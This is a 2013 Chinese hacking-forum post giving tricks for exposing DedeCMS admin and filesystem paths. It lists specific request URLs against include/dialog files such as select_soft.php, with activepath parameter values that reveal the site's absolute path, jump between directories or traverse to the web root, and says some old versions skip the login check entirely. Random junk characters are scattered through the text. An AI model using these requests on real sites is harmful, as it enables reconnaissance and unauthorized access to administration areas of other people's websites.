找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2000|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理; y+ o% G) e; B, b! M
7 X+ A+ |0 c% T7 i" M
员帐号,新版本的就直接转向了后台.2 U% k( f& l4 A) b. w3 G# j, W
6 J3 }7 ~! G2 r, M
2.include/dialog/config.php会爆出后台管理路径
$ W1 G8 {% b9 Q0 ~7 E. C  k: j& ^9 \. k7 j
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
+ V4 m) H0 D' F
4 C+ H* I' n. H/ g# c+ d/ R4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.7 F2 V. X. K% e; A8 G4 q. q

8 L' R# F3 a; N7 L5 j7 o' p% J5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉& Z* \$ g4 d! e" y( r# S  i
3 {) ?: v/ ^+ p) T
到根目录去.不过这些版本的访问地址有些不同., h; i+ `5 X! c1 S( \
地址为require/dialog/select_soft.php?activepath=/././././././././3 t" c8 h; B- ~2 A# F/ x
) g+ t* V2 r5 i3 Q/ `
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..* r2 e' l9 Q+ t- \) O) [/ [7 g
存在相同问题的文件还有- b8 p: G3 }6 u: b- [$ f
include\dialog\select_images.php
0 z8 ]5 ~' R' n8 _% Xinclude\dialog\select_media.php
# ~7 P! d/ v; z; k! ninclude\dialog\select_templets.php​
0 E% G" z" u: n+ [* A, G  u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表